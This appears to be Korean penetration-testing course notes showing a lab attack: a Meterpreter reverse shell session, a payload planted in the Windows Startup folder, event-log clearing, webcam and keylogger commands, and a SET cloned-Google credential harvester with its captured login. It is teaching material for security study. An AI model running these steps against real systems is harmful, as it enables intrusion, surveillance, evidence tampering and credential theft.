Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > sysinfo
Computer : SOLDESK-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : ko_KR
Meterpreter : x86/win32
meterpreter> ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:67:82:7c
MTU : 1500
IPv4 Address : 192.168.20.202
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::888c:d406:3aa8:5513
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
Interface 13
============
Name : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : 2001:0:9d38:90d7:c41:3f24:3f57:eb35
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::c41:3f24:3f57:eb35
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.20.100 266 11
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.20.0 255.255.255.0 192.168.20.202 266 11
192.168.20.202 255.255.255.255 192.168.20.202 266 11
192.168.20.255 255.255.255.255 192.168.20.202 266 11
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.20.202 266 11
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.20.202 266 11
No IPv6 routes were found.
meterpreter > getuid
Server username: soldesk-PC\soldesk
meterpreter > pwd
C:\Users\soldesk\Desktop
meterpreter> lpwd
/root/bin
meterpreter > ls
Listing: C:\Users\soldesk\Desktop
=================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2014-07-18 20:11:38 +0900 .
40777/rwxrwxrwx 0 dir 2014-07-04 17:46:19 +0900 ..
100666/rw-rw-rw- 1379 fil 2014-07-09 22:12:02 +0900 Internet Explorer.lnk
40777/rwxrwxrwx 0 dir 2014-07-08 13:56:03 +0900 Security
100666/rw-rw-rw- 446 fil 2014-07-09 22:12:02 +0900 desktop.ini
100777/rwxrwxrwx 73802 fil 2014-07-20 16:37:01 +0900 reverse_test.exe
meterpreter > download /* download 명령어 사용법 확인 */
Usage: download [options] src1 src2 src3 ... destination
Downloads remote files and directories to the local machine.
OPTIONS:
-h Help banner.
-r Download recursively.
meterpreter > download -r Security /root/bin
[*] downloading: Security\Thunderbird Setup 3.1.7.exe -> /root/bin/Thunderbird Setup 3.1.7.exe
[*] downloaded : Security\Thunderbird Setup 3.1.7.exe -> /root/bin/Thunderbird Setup 3.1.7.exe
-> 다운로드한 파일은 직접 확인하기 바란다.
meterpreter> pwd
C:\Users\soldesk\Desktop
meterpreter > cd ..
meterpreter> pwd
C:\Users\soldesk
meterpreter > cd AppData
meterpreter > cd Roaming
meterpreter > cd Microsoft
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft
meterpreter > cd Windows
meterpreter > cd "Start Menu"
meterpreter > cd Programs
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
meterpreter > cd Startup
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > upload reverse_test.exe .
[*] uploading : reverse_test.exe -> .
[*] uploaded : reverse_test.exe -> .\reverse_test.exe
-> 업로드한 프로그램 윈도우즈에서 확인한다.
-> 시작 > 모든 프로그램 > 시작 프로그램
meterpreter> reboot
Rebooting...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
msf exploit(handler) > quit
-> 시작 프로그램의 폴더 위치 :
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
# msfconsole -r reverse_resource.rc
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.50:4444
[*] Starting the payload handler...
msf exploit(handler) >
-> 만약 대상 PC(windows7) 먼저 부팅한 상태라면 강제적으로 windows7를 재부팅한다.
(windows 7) soldesk 사용자로 로그인한다.
로그인 할 때 악성 프로그램이 실행 될것이다.
(KaliLinux)
msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49161) at
2014-07-20 17:50:09 +0900
<ENTER>
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:4444 ->
192.168.20.202:49161 (192.168.20.202)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
-> KaliLinux에 다시 연결이 된다.
-> 이후에 작업들은 자유롭게 실습한다.
[실습] 작업시나리오를 만들어서 작업한다.
- 여러가지 CMD 수행해 본다.
---------------------------------- 실습 부분 수정 중 -----------------------------
(window 7) 로그 확인 작업
시작 > 제어판 > 관리도구 > 이벤트 뷰어
> Windows 로그 > 시스템
(Kali Linux)
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log=client.sys.eventlog.open('system')
=> #<#<Class:0xaa23ff0>:0xf22a704 @client=#<Session:meterpreter 192.168.20.202:49161
(192.168.20.202) "soldesk-PC\soldesk @ SOLDESK-PC">, @handle=34865156>
>> log.clear
=> #<#<Class:0xaa23ff0>:0xf22a704 @client=#<Session:meterpreter 192.168.20.202:49161
(192.168.20.202) "soldesk-PC\soldesk @ SOLDESK-PC">, @handle=34865156>
>> quit
meterpreter >
-> log=client.sys.eventlog.open('system') 중 system 부분에는
security, system, application, directory service, 'dns server',
'file replication service'
등이 들어 갈수 있다.
-> 파일은 /usr/share/metasploit-framework/scripts/meterpreter/winenum.rb 파일 중 clrevlogs()
함수 부분을 참고한다.
(windows 7) 로그 확인 작업
(주의)
시작 > 제어판 > 관리도구 > 이벤트 뷰어
> Windows 로그 > 시스템
---------------------------------- 실습 부분 수정 중 -----------------------------
[실습] 작업시나리오를 만들어서 작업한다.
-> security, system, applicationk, directory service, dns server, file replication service 등 -> 여러가지에 대해서도 로그를 지우는 작업에 대해서 테스트 한다.
-> (주의) 권한이 되지 않아서 못 지울수도 있다. 그럼 일부 테스트는 넘기고 다른 테스트를 한다.
[실습] 웹캠제어
-> 노트북에 장착이 되어 있는 웹캠 디바이스를 칼리 리눅스에서 제어해 보자.
-> 사용하는 명령어는 다음과 같다.
webcam_list 설치돼 있는 웹캠의 정보를 가져온다.
webcam_start 목록에서 도출된 웹캠을 선택해서 시작한다.
webcam_get_frame 사진의 프레임 값을 정한다. 화질을 지정할 때 사용한다.
webcam_stop 웹캠의 실행을 중지한다.
webcat_audio_record 웹캠 마이크를 사용해 녹음을 지원한다.
-> 다른 장치(기기)에 대해서도 위험성에 대해 논의한다.
- 스마트 TV
- 핸드폰
- 건물내 감시카메라
[실습] 칼리 리눅스 사용하기 5
[참고] 칼리리눅스 스냅샷 뜨기
VMware > VM > snapshot > Take snapshot
(Kali Linux)
MSF 업데이트 작업
# nslookup www.daum.net
Server: 168.126.63.1
Address: 168.126.63.1#53
Non-authoritative answer:
www.daum.net canonical name = www.g.daum.net.
Name: www.g.daum.net
Address: 117.52.2.238
Name: www.g.daum.net
Address: 117.52.2.237
# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
[*] Updating to version 4.9.3-2014071601-1kali2
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다
상태 정보를 읽는 중입니다... 완료
다음 패키지를 업그레이드할 것입니다:
metasploit metasploit-framework
2개 업그레이드, 0개 새로 설치, 0개 제거 및 110개 업그레이드 안 함.
249 M바이트 아카이브를 받아야 합니다.
이 작업 후 5,627 k바이트의 디스크 공간을 더 사용하게 됩니다.
받기:1 http://http.kali.org/kali/ kali/main metasploit-framework i386 4.9.3-2014071601-1kali2 [68.4 MB]
받기:2 http://http.kali.org/kali/ kali/non-free metasploit i386 4.9.3-2014071601-1kali2 [180 MB]
내려받기 249 M바이트, 소요시간 3분 48초 (1,086 k바이트/초)
Reading changelogs... Done
(데이터베이스 읽는중 ...현재 337773개의 파일과 디렉터리가 설치되어 있습니다.)
metasploit-framework 4.9.2-2014052101-1kali1 패키지를 대체할 준비하는 중입니다
(.../metasploit-framework_4.9.3-2014071601-1kali2_i386.deb 사용) ...
대체되는 metasploit-framework 패키지를 푸는 중입니다 ...
metasploit 4.9.2-2014052101-1kali1 패키지를 대체할 준비하는 중입니다
(.../metasploit_4.9.3-2014071601-1kali2_i386.deb 사용) ...
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
'/usr/bin/msfbinscan의 /usr/bin/msfbinscan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfcli의 /usr/bin/msfcli.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfconsole의 /usr/bin/msfconsole.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfd의 /usr/bin/msfd.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfelfscan의 /usr/bin/msfelfscan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfencode의 /usr/bin/msfencode.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfmachscan의 /usr/bin/msfmachscan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfpayload의 /usr/bin/msfpayload.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfpescan의 /usr/bin/msfpescan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfrop의 /usr/bin/msfrop.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfrpc의 /usr/bin/msfrpc.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfrpcd의 /usr/bin/msfrpcd.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfupdate의 /usr/bin/msfupdate.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfvenom의 /usr/bin/msfvenom.framework(으)로 전환, metasploit 패키지'에서 나갑니다
대체되는 metasploit 패키지를 푸는 중입니다 ...
metasploit-framework (4.9.3-2014071601-1kali2) 설정하는 중입니다 ...
metasploit (4.9.3-2014071601-1kali2) 설정하는 중입니다 ...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting PostgreSQL 9.1 database server: main.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
[실습] 칼리 리눅스 사용하기 6
● 윈도우즈(window7)에 Metasploit 다운로드 하고 설치해 보자.
+--- (CLI) msfcli CMD : non-interractive
MSF(msfd) ----+--- (CLI) msfconsole CMD : interractive
+--- (GUI) armitage :
+--- (GUI) msfgui/msfweb :
Armitage 도구와 msfgui
● Armitage는 Raphael Mudge가 개발한 GUI 기반을 둔 도구로 자동 공격 도구(점검 도구)인 메타스플로잇의 도구 중 하나로 포함돼 있다.
● 스캔을 통해 해당 서비스에 적합한 공격을 골라내 선택할 수 있고, 옵션들도 자동으로 입력되기 때문에 점검자 입장에서는 많은 고민을 하지 않아도 되는 아주 편리한 도구이다.
● Armitage와 msfgui가 MSF 4.6부터는 무료 버전에서는 지원되지 않는다. 따라서 해당 도구를 사용하기 위해서는 윈도우 환경에서 별도의 프로그램 설치해 사용하거나, MSF 업데이트한 것에서 모듈을 가져와 기존 버전을 올려서 사용하는 방안을 검토해야 한다.
사용시스템
- Windows 7
- Firewall
다음 사이트에서 프로그램을 다운로드 한다.
msfgui 최신 버전 다운로드
- http://www.scriptjunkie.us/2013/04/using-the-gui-in-metasploit-4-6/
Metasploit 최신 버전 다운로드(윈도우용)
- http://metasploit.com/download
(주의) 설치전에 잠시 Virus Detection 툴은 종료한다.
Metasploit 최신 버전을 윈도우에 설치한다.
인터넷 점검(외부와 통신 가능 여부 확인)
MSF 최신 버전으로 다운로드(윈도우용) - http://metasploit.com/download
Metasploit Community 버전 선택
msfgui 프로그램을 윈도우에 설치한다.
msfgui 최신 버전 프로그램을 다운로드
http://www.scriptjunkie.us/2013/04/using-the-gui-in-metasploit-4-6/
[실습] 칼리 리눅스 사용하기 7
패스트 트랙(Fasttrack): 자동 공격 도구
● 메타스포로잇 모듈을 사용한다.
● 이 도구는 메타스포로잇에 기반을 두고 있고 공격 기법 중 하나인 Autopwn 공격은 내장되어 있는 기능 중 엔맵(nmap)을 통해 네트워크 스캐닝 작업을 하여 대상 시스템을 검색하고, 그에 대한 운영체제, 포트, IP 주소를 분석하며 그에 해당하는 모든 취약점을 자동화 스크립트로 공격한다.
● 칼리리눅스에서는 SET(사회 공학 기법)에 통합되었다.
SET(Social Engineering Tech., 사회 공학적 공격 기법)
● 사회공학이란 컴퓨터 보안에서 인간 상호작용의 깊은 신뢰를 바탕으로 사람들을 속여 정상 보안 절차를 깨트리기 위한 비기술적 침입 수단이다.
● APT(Advanced Persistent Threat) 공격이 이제 공공기관과 특정 사용자를 타겟 대상으로 접근하다 보니 더욱더 내부적인 보안에 신경을 쓰게 되었다.
사용시스템
- Kali Linux
- Windows 7
(Kali Linux)
SE Tookit 실행 방법
Kali Linux > Exploitation Tools > Social Engineering Toolkit > setoolkit
or
# setoolkit
# vi /usr/share/set/config/set_config
### Path to the pem file to utilize certificates with the web attack vector (required)
### You can create your own utilizing set, just turn on self_signed_cert
### If your using this flag, ensure openssl is installed! To turn this on turn SELF_SIGNED_CERT
### to the on position.
[수정전]
SELF_SIGNED_CERT=OFF
[수정후]
SELF_SIGNED_CERT=ON
-> http://chogar.blog.me/80210217409 칼리리눅스에서 SET 사용법에 대한 자세한 내용
# setoolkit
[*] Checking to see if bleeding-edge repos are active.
[!] Bleeding edge repos were not detected. This is recommended.
Do you want to enable bleeding-edge repos for fast updates [yes/no]: yes
[*] Adding Kali bleeding edge to sources.list for updates.
[*] It is recommended to now run apt-get update && apt-get upgrade && apt-get dist-upgrade && apt-get autoremove and restart SET.
[-] New set_config.py file generated on: 2014-07-21 13:45:07.325217
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-07-21 13:45:07.325217
[*] SET is using the new config, no need to restart
Copyright 2013, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list
of conditions and the following disclaimer
in the documentation and/or other materials provided with the distribution.
* Neither the name of Social-Engineer Toolkit nor the names of its contributors may be
used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.
Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.
Do you agree to the terms of service [y/n]: y
!\_________________________/!\
!! !! \
!! Social-Engineer Toolkit !! \
!! !! !
!! Free !! !
!! !! !
!! #hugs !! !
!! !! !
!! By: TrustedSec !! /
!!_________________________!! /
!/_________________________\!/
__\_________________/__/!_
!_______________________!/
________________________
/oooo oooo oooo oooo /!
/ooooooooooooooooooooooo/ /
/ooooooooooooooooooooooo/ /
/C=_____________________/_/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 6.0 [---]
[---] Codename: 'Rebellion' [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 4
[*] You are running Kali Linux which maintains SET updates.
[*] You can enable bleeding-edge repos for up-to-date SET.
[*] Checking to see if bleeding-edge repos are active.
[*] Bleeding edge already active..Moving on..
..... (중략) ......
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 5
[-] New set_config.py file generated on: 2014-07-21 13:49:43.152309
[-] Verifying configuration update...
[!] Update failed? Timestamp on config file is: 2014-07-21 13:45:07.325217
[*] SET is using the new config, no need to restart
..... (중략) ......
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..... (중략) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu
set:webattack> 3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack> 1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.20.50
1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo
set:webattack> Select a template: 2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
[!] Apache may be not running, do you want SET to start the process? [y/n]:y
[ ok ] Starting web server: apache2.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
[TERM2]
# cd /var/www
# ls
# cat index.html
# cat post.php
# cat harvester_*.txt
# pgrep -lf apache2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu
set:webattack> 99
..... (중략) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 99
..... (중략) .....
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 99
Thank you for shopping with the Social-Engineer Toolkit.
Hack the Gibson...and remember...hugs are worth more than handshakes.
#
(windows7)
인터넷 익스플러워
-> http://192.168.20.50/
-> 구글 사이트가 보임
ID : 이메일
PASS: 암호
(Kali Linux)
# cd /var/www
# cat harvester_*.txt
Array
(
[GALX] => SJLCkfgaqoM
[continue] => https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX
[service] => lso
[dsh] => -7381887106725792428
[_utf8] => ☃
[bgresponse] => js_disabled
[pstMsg] => 1
[dnConn] =>
[checkConnection] =>
[checkedDomains] => youtube
[Email] => jang4sc@hanmail.net
[Passwd] => test1234
[signIn] => Sign in
[PersistentCookie] => yes
)
(정리) 이전의 작업과 비교해 보자
(이전 실습) ARP Spoofing + DNS Spoofing
(현재 실습) Fake Site 구성 + ID/PASS 수집
(Kali Linux)
# setoolkit
..... (중략) .....
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
..... (중략) .....
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.
The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
99) Return to Main Menu
set:webattack>1
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection: 192.168.20.50
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.
